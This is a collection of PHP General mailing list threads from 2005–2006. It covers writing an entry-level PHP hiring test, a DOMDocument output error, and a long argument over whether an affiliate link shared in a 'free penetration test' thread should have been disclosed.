some fashion. -- John C. Nichel IV Programmer/System Admin (ÜberGeek) Dot Com Holdings of Buffalo 716.856.9675 [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Basic PHP knowledge test
We're looking to hire an entry level php programmer here, and I've been tasked with writing the test to evaluate the potential candidates. Being the lazy guy that I am, I naturally turned to Google to see if I could find some tests that I could use. After clicking thru many links, and finding mostly 'basic php tutorials', I've come here to ask you people to do my homework for me. ;) Does anyone have any links/resources for a basic php knowledge test? If not, I'll have to write one from scratch myself, and mess up the rest of my day of goofing off/sleeping. -- John C. Nichel IV Programmer/System Admin (ÜberGeek) Dot Com Holdings of Buffalo 716.856.9675 [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Basic PHP knowledge test
On Wednesday 19 July 2006 10:31, John Nichel wrote: We're looking to hire an entry level php programmer here, and I've been tasked with writing the test to evaluate the potential candidates. Being the lazy guy that I am, I naturally turned to Google to see if I could find some tests that I could use. After clicking thru many links, and finding mostly 'basic php tutorials', I've come here to ask you people to do my homework for me. ;) Does anyone have any links/resources for a basic php knowledge test? If not, I'll have to write one from scratch myself, and mess up the rest of my day of goofing off/sleeping. -- John C. Nichel IV Programmer/System Admin (ÜberGeek) Dot Com Holdings of Buffalo 716.856.9675 [EMAIL PROTECTED] I just recently ran into the same problem. I got tired of trying to find one, so I made it myself. It's very specific to what we do here though. I'd definitely be interested in that info though, because we're still looking, and I'm not totally happy with mine, as I didn't have a whole lot of time to write it. -- Ray Hauge Programmer/Systems Administrator American Student Loan Services www.americanstudentloan.com 1.800.575.1099 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Basic PHP knowledge test
We're looking to hire an entry level php programmer here, and I've been tasked with writing the test to evaluate the potential candidates. Being the lazy guy that I am, I naturally turned to Google to see if I could find some tests that I could use. After clicking thru many links, and finding mostly 'basic php tutorials', I've come here to ask you people to do my homework for me. ;) Does anyone have any links/resources for a basic php knowledge test? If not, I'll have to write one from scratch myself, and mess up the rest of my day of goofing off/sleeping. stock answer STFW! RTFM!! STFA!! STFU!! /stock answer Ahem... Now that that's out of my system, you could start with the Zend sample exam: http://www.zend.com/education/certification/self_test I know you're saying entry level, not Zend certified, but there are some pretty basic questions there. JM -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Basic PHP knowledge test
Does anyone have any links/resources for a basic php knowledge test? If not, I'll have to write one from scratch myself, and mess up the rest of my day of goofing off/sleeping. It wouldn't hurt to pick up one of those Zend PHP Certification study guides and pull some things from there. Or, browse the PHP manual for commonly used functions and ask questions from there. What might work better though would be to pull some questions from this mailing list and ask them how they would answer them. It will give you some insight into their knowledge of PHP as well as how well they can solve problems using the language. That, in my (not so) humble opinion, is better than just knowledge of the language. You need to know how to apply it to be a decent programmer. HTH. I would be very interested in seeing what you come up with, actually. (o: -K. Bear -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Basic PHP knowledge test
Jim Moseby wrote: stock answer STFW! RTFM!! STFA!! STFU!! /stock answer That totally goes against my being lazy. Hell, I didn't get to where I am today by *not* exploiting the 'little people' :-p -- John C. Nichel IV Programmer/System Admin (ÜberGeek) Dot Com Holdings of Buffalo 716.856.9675 [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Basic PHP knowledge test
Ray Hauge wrote: On Wednesday 19 July 2006 10:31, John Nichel wrote: We're looking to hire an entry level php programmer here, and I've been tasked with writing the test to evaluate the potential candidates. Being the lazy guy that I am, I naturally turned to Google to see if I could find some tests that I could use. After clicking thru many links, and finding mostly 'basic php tutorials', I've come here to ask you people to do my homework for me. ;) Does anyone have any links/resources for a basic php knowledge test? If not, I'll have to write one from scratch myself, and mess up the rest of my day of goofing off/sleeping. I just recently ran into the same problem. I got tired of trying to find one, so I made it myself. It's very specific to what we do here though. I'd definitely be interested in that info though, because we're still looking, and I'm not totally happy with mine, as I didn't have a whole lot of time to write it. Yeah, reading the writing on the wall, I think I'm just going to have to suck it up, and write it. The worst part of it is, I'm going to have to be involved in the interview process, and I'm *not* a people person. ;) I think I'll go with a few syntax questions (not really worried about that aspect, cause even after 8 years of doing php, I still hit the manual a few times a week), maybe have the people write a basic function or two to check how clean/readable their code it. Possibly also test how efficient their code would be (like to they call a function inside of a loop to get a static value that could have been set outside the loop). Basic db stuff...ugh, I don't feel like doing this. I'll post what I come up with here; maybe we (this list) can combine ideas and such, and actually put together a pretty good test or two so we can spare the next poor soul who gets put into this position by MBA wielding managers. -- John C. Nichel IV Programmer/System Admin (ÜberGeek) Dot Com Holdings of Buffalo 716.856.9675 [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Basic PHP knowledge test
On Wednesday 19 July 2006 11:12, John Nichel wrote: Yeah, reading the writing on the wall, I think I'm just going to have to suck it up, and write it. The worst part of it is, I'm going to have to be involved in the interview process, and I'm *not* a people person. ;) I think I'll go with a few syntax questions (not really worried about that aspect, cause even after 8 years of doing php, I still hit the manual a few times a week), maybe have the people write a basic function or two to check how clean/readable their code it. Possibly also test how efficient their code would be (like to they call a function inside of a loop to get a static value that could have been set outside the loop). Basic db stuff...ugh, I don't feel like doing this. I'll post what I come up with here; maybe we (this list) can combine ideas and such, and actually put together a pretty good test or two so we can spare the next poor soul who gets put into this position by MBA wielding managers. That's pretty much what I did. I went with questions that would show how much they understand from a conceptual level. I don't know many people who don't have www.php.net as a bookmark. I did basic questions to show they understood OOP, recursion, pass-by-reference, etc. I also had to be in the interview. There were a lot of odd moments of silence when people were looking at me to ask some questions. I just wanted him to do the quiz and that was pretty much it ;) -- Ray Hauge Programmer/Systems Administrator American Student Loan Services www.americanstudentloan.com 1.800.575.1099 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Basic PHP knowledge test
On 7/19/06, KermodeBear [EMAIL PROTECTED] wrote: Does anyone have any links/resources for a basic php knowledge test? If not, I'll have to write one from scratch myself, and mess up the rest of my day of goofing off/sleeping. It wouldn't hurt to pick up one of those Zend PHP Certification study guides and pull some things from there. Or, browse the PHP manual for commonly used functions and ask questions from there. Assuming that doing so was either Fair use or authorised by Zend, and that you aren't going to get your ass sued for copyright violation - then again maybe on a small enough scale. What might work better though would be to pull some questions from this mailing list and ask them how they would answer them. It will give you some insight into their knowledge of PHP as well as how well they can solve problems using the language. To an extent. I personally think the best way is to outline a set of situations and have them write scripts to solve that problem. You need to know that they have both the knowledge and language to solve a problem. It doesn't really matter if they know the syntax of strpos, if they know other methods of solving their potential problems. Perhaps a CSV to MySQL converter - although not exactly that, because I've mentioned it on the list :p That, in my (not so) humble opinion, is better than just knowledge of the language. You need to know how to apply it to be a decent programmer. HTH. I would be very interested in seeing what you come up with, actually. (o: After the person sitting the exam has passed their test. -K. Bear -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Basic PHP knowledge test
At 12:12 PM -0400 7/19/06, John Nichel wrote: The worst part of it is, I'm going to have to be involved in the interview process, and I'm *not* a people person. ;) Really, who would have guessed that? ;) tedd -- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Basic PHP knowledge test
At 11:31 AM -0400 7/19/06, John Nichel wrote: We're looking to hire an entry level php programmer here, and I've been tasked with writing the test to evaluate the potential candidates. Being the lazy guy that I am, I naturally turned to Google to see if I could find some tests that I could use. After clicking thru many links, and finding mostly 'basic php tutorials', I've come here to ask you people to do my homework for me. ;) Does anyone have any links/resources for a basic php knowledge test? If not, I'll have to write one from scratch myself, and mess up the rest of my day of goofing off/sleeping. Why is hr typically so limited in creativity? Do you want someone who can read and regurgitate the manual or do you want someone who can get the job done? My advice, give the candidates problems and see how they solve them. Even if they don't finish, you get an idea of how they think. tedd -- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] this is a test
this is a test
[PHP] simple DOM/XML test fails in php
I have a very simple DOM test set up which is failing. Environment is
apacie 1.3.x, WIN xp, PHP 5.1.2 ; DOM seetings outlined in phpinfo()
indicate various DOM/XML support is enabled.
Failing php is:
?php
$dom = new DOMDocument('1.0', 'iso-8859-1');
echo $dom-saveXML();
?
which results in:
The XML page cannot be displayed
Cannot view XML input using style sheet. Please correct the error and then
click the Refresh button, or try again later.
XML document must have a top level element. Error processing resource
'http://127.0.0.1/domtest.php'.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] simple DOM/XML test fails in php
I have a very simple DOM test set up which is failing. Environment is
apacie 1.3.x, WIN xp, PHP 5.1.2 ; DOM seetings outlined in phpinfo()
indicate various DOM/XML support is enabled.
Failing php is:
?php
$dom = new DOMDocument('1.0', 'iso-8859-1');
echo $dom-saveXML();
?
which results in:
The XML page cannot be displayed
Cannot view XML input using style sheet. Please correct the error and then
click the Refresh button, or try again later.
XML document must have a top level element. Error processing resource
'http://127.0.0.1/domtest.php'.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] simple DOM/XML test fails in php
On Fri, January 20, 2006 10:20 am, Larry Hughes wrote:
I have a very simple DOM test set up which is failing. Environment is
apacie 1.3.x, WIN xp, PHP 5.1.2 ; DOM seetings outlined in phpinfo()
indicate various DOM/XML support is enabled.
Failing php is:
?php
$dom = new DOMDocument('1.0', 'iso-8859-1');
echo $dom-saveXML();
?
which results in:
The XML page cannot be displayed
Cannot view XML input using style sheet. Please correct the error and
then
click the Refresh button, or try again later.
XML document must have a top level element. Error processing resource
'http://127.0.0.1/domtest.php'.
Seems pretty clear.
You need to put something *IN* your DOMDocument to have it be valid.
A totally empty document is not valid XML.
Add some line between the 2 lines you have, and do something with the
$dom to add something to it. No idea how you do that, mind you, but
it's what you need.
--
Like Music?
http://l-i-e.com/artists.htm
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Hello, on 05/27/2005 11:50 PM Ryan A said the following: I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. fair enough, you could have given him the link the the page directly _without_ your affiliate add on code, but since you did tack your aff code on, I think you should have mentioned it That would be irrelevant because nothing changes for the anybody that follows the link with or without the aff code. The service is still free and the service is the same. Not really, the service is still the same... true, but what happens if he decides to buy one more scan (49$) from that site or decides to buy a 1 month scanning option ($119) or 1 year scanning ($899)? Does a little birdie get 35% (recurring) of that? Read my phrase again: nothing changes for anybody that follows the link, whether or not anybody gains from any referrals. That means that if a person that follows the link that I suggested buys $1000 worth of services or goods, he would still pay $1000 if the link did not contain my referral id. I am sure that you that it happens that way, but the way you are putting you are confusing other people reading the thread by making them believe that the price would be different if I were to get any commissions. That is false. The price and the service are the same for any user. - If I am acting with malice as you suggest just because I did not mention that the URL contained my affiliate id, what would you say about the PHP group that lists a pile of books in Amazon linked with their affiliate id but they do not mention that fact anywhere in their pages? http://www.php.net/books.php -- Ummm. this is whats written on the page: If you buy the book using the links on this page, you are helping to support PHP development! Lucky for me, English is my mother tongue but I think even if it was'nt and my IQ was quite a bit lower I would still the idea that if I buy a book using one of those links the site was gaining from it. Why? because they are being open,decent AND honest about it, see the If you buy the book using the links .you are helping to support parts? You are not being serious and you are only acting with bias against me, as nowhere in that page it says that when you use those links, the PHP Group (I suppose) may earn 15% on commissions of books sold for their referrals to Amazon. If I just go in that page or some other page that lists PHP books, pick the ISBN a book of Rasmus Lerdorf (the creator of PHP) and buy it directly in Amazon or somewhere else, I am sure I will be helping PHP development somehow, but the PHP Group would not get a cent for the referral. Still, the links in those pages use the PHP Group Amazon affiliate ID, like the link I suggested before includes my affiliate ID. The books page omits the actual way it helps PHP development and the affiliate ID are hidden in HTML, unlike my message that was in plain text (I do not post in HTML ever). For me, of course there is nothing wrong on the PHP Group help themselves making money with referrals. My point is that it is pretty common to not distract people with the details of who gets what with referrals because it does not change anything for who follows a link with our without the referral id. The price and the service is the same. What matters is who wants free help can get free help even if that help provides some benefit to the person that is providing it. If a person that gets free help does not like that whoever provides the help benefits from that too, that person is just being ungrateful and so does not deserve to be helped. Nobody is pointing fingers at you because you want to make money, EVERYONE That is all you did! you challenged my credibility by distorting the facts. Of course that bugs me because for 8 years I have been participating in PHP mailing lists helping people leading to solutions to the problems that they pose, and your attitude is misleading people into believing that I am not helping them. Cool, just one question. everytime you help someone are you helping yourself too like the way you tried to help Andy? Have you noticed some of the guys here who unselfishly answer something like: I see what the problem is, use this code instead code here and replace this code here and try reading about this function here url here Now, _thats_ unselfishly helping someone...no gain for the helper except that warm feeling and a clear conciencemaybe even a good nights sleep. Don't be ridiculous! Everybody gains something when he helps somebody on these lists. Sometimes people just feel good for being helpful (think for instance of Richard Lynch), other times people actually gain reputation and are contracted to provide paid jobs (think for instance of
RE: [PHP] Re: Free penetration test
-Original Message- From: Rasmus Lerdorf [mailto:[EMAIL PROTECTED] Sent: Saturday, May 28, 2005 3:48 PM To: Ryan A Cc: php Subject: Re: [PHP] Re: Free penetration test Ryan A wrote: That is extremly generious of you as I didnt really think you would have the time considering the amount of projects,books etc you are involved with (yep, I read your CV on your site :-D ), but I would like to take you up on your offer as I am sure to learn something from it...only problem is, the site I have just made is mostly in Swedish...I can give you a star account (Star accounts are the paid accounts) for you to login and test the site, but do you think you could still test it since its mostly in Swedish? Ja, jeg tror jeg kan klare det. Sproget er ret ligegyldigt, jeg checker bare for XSS problemer med et automatisk tool jeg har skrevet. Så det er heller ikke så meget arbejde. *LOL* Nice comeback Rasmus For those who doesn´t know, Rasmus is danish, and the language is in many ways and words similar to Swedish (Sweden and denmark are neighbour countries) Well, Ryan probably didn´t know this, but that made his posting somewhat funny :-) -- Med venlig hilsen / best regards ComX Networks A/S Kim Madsen Systemudvikler/Systemdeveloper ComX Networks A/S Naverland 31, 2 DK-2600 Glostrup Denmark Phone: +45 70 25 74 74 Fax: +45 70 25 73 74 Web: www.comx.dk E-mail: [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Re: Free penetration test
For me, of course there is nothing wrong on the PHP Group help themselves making money with referrals. My point is that it is pretty common to not distract people with the details of who gets what with referrals because it does not change anything for who follows a link with our without the referral id. The price and the service is the same. What matters is who wants free help can get free help even if that help provides some benefit to the person that is providing it. If a person that gets free help does not like that whoever provides the help benefits from that too, that person is just being ungrateful and so does not deserve to be helped. Sweet Mamma, are we *still* arguing about this? Manuel (and whomever else): in general it is A Very Good Idea to declare whenever you have a commercial interest in a solution you provide in a forum such as this one. The problem, whether you agree or not, is that others will ask themselves, Did Manuel (or whomever) supply this link because it is the best solution he (or she) knows of to my problem, or because it is the only one from which he (or she) can earn money? It boils down to a question of motive: are you trying to help, or to use the forum as a method of earning extra income, or both? I tend to think the best of people -- I assume you offered the link in good faith, and you've said as much in posts since. That doesn't negate the fact that the appropriate place to explain your commercial affiliation is at the point where you originally supply such a link. It isn't hard. A simple paragraph similar to the following would be more than adequate: Please note: I have an affiliation relationship with this site. I picked it because it was the best I found when I was looking for solutions to the same problem you're asking about, and share it with you for the very same reason. See? Easy, and no-one questions your motives. To everyone else: many if not most of us take direct commercial benefit from being involved in this forum. I know I do. I ask questions about problems I can't solve on my own. I follow and keep track of solutions to other people's problems that seem innovative and better formulated than my own methods of dealing with those problems. I keep my general skills sharpened by helping people solve problems in areas where my skills are relatively strong. It would be naïve of me not to admit that this has a direct impact on my earning potential. As a group of professionals and semi-professionals (and even those amongst us who are simply learning or developing PHP skills out of general interest), it should be enough to say: Hey, that wasn't the best way to handle this. In future, you'd probably cause less aggravation by doing the following... And then move on. The person doesn't have to agree. You've done your part for peace-as-we-know-it in the PHP forum. If that simply isn't good enough for you in situations such as these, if you have to argue with Manuel (or whomever) until we've all but forgotten what the original freaking question was that began the holy war, then can I make a suggestion? If you happen to be a professional or semi-professional PHP programmer, you might want to think about tagging any and all posts you make to this forum about problems you're having with: I earn money from PHP programming. If you help me with this problem it will have a commercial benefit to me. And, really, wouldn't that be ridiculous? So, seriously, let's move on. At least until the next time someone posts an affiliation link without declaring their commercial interest, and then we can all look forward to having this argument again. Regards, Murray -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Hi, This is getting pretty irritating because by now even a stone would have understood what I was trying to say...so either you are playing dumb or you just dont want to understand, that said, this is my last response as I have much better things to do than say the same thing over and over...and over and over etc again. Not really, the service is still the same... true, but what happens if he decides to buy one more scan (49$) from that site or decides to buy a 1 month scanning option ($119) or 1 year scanning ($899)? Does a little birdie get 35% (recurring) of that? ** Read my phrase again: nothing changes for anybody that follows the link, whether or not anybody gains from any referrals. That means that if a person that follows the link that I suggested buys $1000 worth of services or goods, he would still pay $1000 if the link did not contain my referral id. ** Thats how affilate systems work, they dont add your commision to their products, they give you a kind of brokers feebut you already know that of course. When you say nothing changes for anybody that follows the link thats a half truth as you would profit if he actually buys something as i have said over and over and.again. ** but the way you are putting you are confusing other people reading the thread by making them believe that the price would be different if I were to get any commissions. ** Never said that, all I said (and i'm repeating for the damn 10th time(at least)) that you should just mention that the link you send contains your affiliate code and you gain something if they buy. what would you say about the PHP group that lists a pile of books in Amazon linked with their affiliate id but they do not mention that fact anywhere in their pages? http://www.php.net/books.php -- Ummm. this is whats written on the page: If you buy the book using the links on this page, you are helping to support PHP development! Lucky for me, English is my mother tongue but I think even if it was'nt and my IQ was quite a bit lower I would still the idea that if I buy a book using one of those links the site was gaining from it. *** You are not being serious and you are only acting with bias against me, as nowhere in that page it says that when you use those links, the PHP Group (I suppose) may earn 15% on commissions of books sold for their referrals to Amazon. *** Bias against you? You nuts or something? They dont have to say how much they are getting, they just mentioned that they gain from it (the decent thing) Maybe you could have written; clicking the link might help me pay my bills...or is even that too much for you? *** My point is that it is pretty common to not distract people with the details of who gets what with referrals because it does not change anything for who follows a link with our without the referral id. The price and the service is the same. *** First, you are not distracting anybody, you are simply being honest and showing the person you are helping them but you are also conntected with the site and may have a different motive for helping them...let them judge. *** What matters is who wants free help can get free help even if that help provides some benefit to the person that is providing it. If a person that gets free help does not like that whoever provides the help benefits from that too, that person is just being ungrateful and so does not deserve to be helped. *** Arrrgh, that just sounds so wrong I wont even go there. *** Don't be ridiculous! Everybody gains something when he helps somebody on these lists. Sometimes people just feel good for being helpful (think for instance of Richard Lynch), other times people actually gain reputation and are contracted to provide paid jobs (think for instance of Chris Shifflet), some may even gain money indirectly from commission referrals (think of the PHP Group with the books page), etc.. *** Fair enough...and people like me gain knowledge and tips from reading other peoples posts. As for people who gain indirect commission referrals...which is what this is all about... let me put it in a way that might help you understand the whole point of this side-discussion: T H E Y S A Y T H E Y A R E C O N N E C T E D W I T H T H E S I T E in some way...or that they are gaining from the referral (like in the php books link) *** but all my time is taken with all the PHP related projects that I work on and at least hundreds of thousands of users benefit. *** (no comment) :-) End of discussion from my side, if you want to continue to argue about the above please write to yourself (both what I would say and your answer), but what I do suggest is you take some time off and do some thinking... we are not all out to get you...look into the words 'paranoid' and 'megalomaniac' Have a nice day. Regards, Ryan A -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.322 / Virus Database: 267.3.0 - Release
Re: [PHP] Re: Free penetration test
Hello, on 05/30/2005 02:21 PM Ryan A said the following: Not really, the service is still the same... true, but what happens if he decides to buy one more scan (49$) from that site or decides to buy a 1 month scanning option ($119) or 1 year scanning ($899)? Does a little birdie get 35% (recurring) of that? ** Read my phrase again: nothing changes for anybody that follows the link, whether or not anybody gains from any referrals. That means that if a person that follows the link that I suggested buys $1000 worth of services or goods, he would still pay $1000 if the link did not contain my referral id. ** Thats how affilate systems work, they dont add your commision to their products, they give you a kind of brokers feebut you already know that of course. When you say nothing changes for anybody that follows the link thats a half truth as you would profit if he actually buys something as i have said over and over and.again. Right, that just confirms what I said. The fact that I could profit or not does not change anything for whoever follows that link because anything that I may gain will not be taken from a loss caused to whoever follows the link. ** but the way you are putting you are confusing other people reading the thread by making them believe that the price would be different if I were to get any commissions. ** Never said that, all I said (and i'm repeating for the damn 10th time(at least)) that you should just mention that the link you send contains your affiliate code and you gain something if they buy. No, I don't agree. As I said many times it would be irrelevant because it would not change anything in the price or the service that was suggested. what would you say about the PHP group that lists a pile of books in Amazon linked with their affiliate id but they do not mention that fact anywhere in their pages? http://www.php.net/books.php -- Ummm. this is whats written on the page: If you buy the book using the links on this page, you are helping to support PHP development! Lucky for me, English is my mother tongue but I think even if it was'nt and my IQ was quite a bit lower I would still the idea that if I buy a book using one of those links the site was gaining from it. *** You are not being serious and you are only acting with bias against me, as nowhere in that page it says that when you use those links, the PHP Group (I suppose) may earn 15% on commissions of books sold for their referrals to Amazon. *** Bias against you? You nuts or something? You started attacking my reputation and you are still insulting calling me dishonest, paranoid and megalomaniac. Until you cease your attacks I feel I have the right to defend myself. They dont have to say how much they are getting, they just mentioned that they gain from it (the decent thing) That is false. They do not mention they gain commissions from books sold. I also did not say I gain commissions from referrals, still you insist that I should be crucified for not have done that, while the same omission in the PHP books page is acceptable for you. Therefore, your bias against me is proven. Maybe you could have written; clicking the link might help me pay my bills...or is even that too much for you? As I said and explained many times, that is irrelevant and distracting for the users that may follow my suggestion. *** My point is that it is pretty common to not distract people with the details of who gets what with referrals because it does not change anything for who follows a link with our without the referral id. The price and the service is the same. *** First, you are not distracting anybody, you are simply being honest and showing the person you are helping them I am honest because I explained that when I was asked. Your claim that I am not being honest otherwise, constitutes a direct insult to me. *** Don't be ridiculous! Everybody gains something when he helps somebody on these lists. Sometimes people just feel good for being helpful (think for instance of Richard Lynch), other times people actually gain reputation and are contracted to provide paid jobs (think for instance of Chris Shifflet), some may even gain money indirectly from commission referrals (think of the PHP Group with the books page), etc.. *** Fair enough...and people like me gain knowledge and tips from reading other peoples posts. As for people who gain indirect commission referrals...which is what this is all about... let me put it in a way that might help you understand the whole point of this side-discussion: T H E Y S A Y T H E Y A R E C O N N E C T E D W I T H T H E S I T E in some way...or that they are gaining from the referral (like in the php books link) Go a look in the PHP books and tell me where it is mentioned explicitly that the PHP Group is connected to Amazon and other stores. Can't find that mention? My point is proven. End of discussion
Re: [PHP] Re: Free penetration test
BTW, what do you call to a person that throws stones to another and then runs away to not face the consequences?! Fine, I'll play your game a little longer...but offlist as I think the list has had enough of this, I'm also a bit busy now so expect a reply from me after a few hours. Regards, Ryan -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.322 / Virus Database: 267.3.0 - Release Date: 5/30/2005 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Hehe, well put...a few things you forgot to write: Ryan A and Rory Browne got so irritated because its like talking to a tree.in english when the tree only understands some other language :-D that they tried to throw in the towel I was so fed up I was going to drop the whole thing because certain well wishers wrote to me too telling me it was hopeless to try to reason or use logic with him...and I pretty much dropped it till he got the hairs at the back of my neck up by saying i like saying things and running.. so am taking it offlist. Consider this link: http://www.somesite.com/section=serverssomething=somethingelsea=bb=ablah=jackbill=gatesgates=evilaffilate=1145more=gibberishclaudia=too_good_for_that_magician_guy imagine someone gave you that kind of a link when you asked for help.pretty good but unless you really searched for it you would miss the affiliate=1145 part...yes, its there..check it out...the affiliate could be smaller too..something like aff=1045 but its lost in the other gibberish of the url... Decency would dictate that the person sending you the link tells you theres an affiliate code there somewhere... thats all I am sayingbut I cant seem to get that message accross to someone...so am pretty much throwing in the towel after I have a few words offlist ;-) But all in all, its been a pretty good few weeks on the list with no one asking which php editor is best or how do you make a script sleep for x seconds or how do i do on the clients machine? Peace all. Cheers, Ryan On 5/31/2005 12:53:26 AM, Rory Browne ([EMAIL PROTECTED]) wrote: Okay Let me summerise what has happened here. 1: The OP asked for a free penetration test. 2: Chris points out that his firm, which provides the suggested service, albeit not free, generally recommends a code audit instead. 3: Manuel Lemos, points out a site that provides a free sample test. The url includes a referer id, which Manuel doesn't see a need to mention. 4: Ryan A, points out that Manuel Lemos is connected to the site, and that his link contains a referer id. He suggests that such facts be explicitly disclosed. 5: Manuel Lemos, responds saying that it is irrelevent, that he gains income from his link to the site. He states that Chris Shifett is connected to the site that he mentions, and that the php group earn money from listing books on their website. 6: Ryan A, and Rory Browne(ie me) explain, that users generally like to know how to treat information they receive. They like to decide for themselves if the information may be biased. They also discredit Manuels statments regarding the php groups listing of amazon books. 7: Manuel repeats step 5, which results in Rory and Ryan repeating step 6. This happens numerous times. It becomes clear, that Manuel will not listen to reason, and will instead repeat the same discredited arguments. During this time, others point out that they too would like to be informed of any potential bias, so that they can decide for themselves if the information is actually biased. 8: Anonymous third parties, suggest via private email, that Manuel cannot be reasoned with. I decide that I'd perfer to make such assertions myself, without relying the judgement of others, and give Manuel the benifit of the doubt. Manuel begins making wild accusations, leading Ryan ane Rory to take the discussion off-list, until such stage that a resolution is found. Let me now summerise the above into an even shorter, and clearer message: Grow up, and get a grip. We don't know you well enough to have some wild conspiracy against you. -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.322 / Virus Database: 267.3.0 - Release Date: 5/30/2005 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Okay: 1: Calm down. You're sensationalism and paranoia make you look like a nutcase.(no offence) 2: That would be irrelevant because nothing changes for the anybody that follows the link with or without the aff code. The service is still free Obviously we don't consider it irrelevent. That's all we were trying to say. We're not trying to paint you as some sort of monster. I appreciate your posting of that Link. I've used it. I would also have liked to know that you were affiliated with the site. 3: Relax. This is going away out of proportion. 4: as you get 35% (minimum, for upto a year) if he signs up...not that anybodys bothered if you make money That is false. If he signs up and tries the free penetration test service that he asked and I suggested, I do not gain anything. Stop deceiving people! Last time I checked 35% of free, was still free. I therefore put it to you that even if he doesn't sign up and make any payment, you still get 35% of that payment(consisting of $0/Eur0/£0) he didn't make. 5: what would you say about the PHP group that lists a pile of books in Amazon linked with their affiliate id but they do not mention that fact anywhere in their pages? http://www.php.net/books.php Quote from aforementioned website: If you buy the book using the links on this page, you are helping to support PHP development! . Any intellegent user would be able to decipher from that, that the php group obtains some soft of referal fee, or benifit somehow in your purchase of said books from the php website. 6: I was selling security auditing services, when in fact the only person that doing that in this thread was Chris Shiflet. I know that, you know that, the majority of the people on this list know that. Chris told us that. Personally I'd be pretty pissed off, if Chris posted some website he'd found without mentioning that it was his website. The reason I'm _not_ pissed off with you, is because it wasn't actually your website. I was simply asking you that in future would you mention your _potential_ bias, even if such bias doesn't exist. On 5/28/05, Manuel Lemos [EMAIL PROTECTED] wrote: Hello, on 05/27/2005 06:46 PM Ryan A said the following: - I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. - fair enough, you could have given him the link the the page directly _without_ your affiliate add on code, but since you did tack your aff code on, I think you should have mentioned it That would be irrelevant because nothing changes for the anybody that follows the link with or without the aff code. The service is still free and the service is the same. as you get 35% (minimum, for upto a year) if he signs up...not that anybodys bothered if you make money That is false. If he signs up and tries the free penetration test service that he asked and I suggested, I do not gain anything. Stop deceiving people! -- If I ever gain anything with the referral, he would not be paying more for whatever services he would order. -- Never said he would be paying extra, but the point is you would be making money off him (not a bad thing again) without his knowledge (bad thing)...if he finds the link really useful I think to show his appreciation he would _make sure_ your affiliate link is tacked there..I would. Stop distorting the facts. You are implying that I acting with malice by stating that I will make money by hiding facts when a) Andy never asked explicitly for a service that the referer would not gain anything b) I am not hiding anything as the affiliate id is quite visible in the URL c) I never denied that the URL contains my affiliate id. If I am acting with malice as you suggest just because I did not mention that the URL contained my affiliate id, what would you say about the PHP group that lists a pile of books in Amazon linked with their affiliate id but they do not mention that fact anywhere in their pages? http://www.php.net/books.php Maybe I am Darth Vader and the PHP Group is the whole dark side of the force. Get real, you are being ridiculous! Another example, I am an affilate of interland, if someone asks about dedicated hosting I could send them there they would join, not pay a cent extra, but i get a commision *without their knowledge* (10% recurring)... am I helping them or myself? Yeah, right, you are fighting the dark side of the force to be the good guy that just lives from the air that you breath and nobody else should be allowed to gain anything from referrals unless you warn users that you refer that you are keeping a commission, despite the price is always the same!?! - So, I do not see your point in bugging me for this. If you feel that I am not helping Andy, I would
Re: [PHP] Re: Free penetration test
Hi, Is it bad to give field names the same name as their database counterpart? i.e. In a database the first name column might be known as 'fname'. Should a form field called 'fname' NOT be created? I actually had the same question a little while ago and after doing some reading it left me even more confused... As long as you recognize that you need to filter things appropriately it doesn't really matter. Kind of came to that conclusion after a little while and started to use the ADODB class to filter all user input that goes to the DB... I would appreciate it if you tell me if you have used the class and if you have any warnings/notes/suggestions about how even after using that class I can screw up. If you have written something and you'd like me to take a quick look for any obvious exploits, feel free to mail me privately. If your site requires a login, you can send me a test login if you want so I can dig a bit deeper, otherwise I will still prod it from the outside. I'm not going to hack into your server in any way, just prod your web app That is extremly generious of you as I didnt really think you would have the time considering the amount of projects,books etc you are involved with (yep, I read your CV on your site :-D ), but I would like to take you up on your offer as I am sure to learn something from it...only problem is, the site I have just made is mostly in Swedish...I can give you a star account (Star accounts are the paid accounts) for you to login and test the site, but 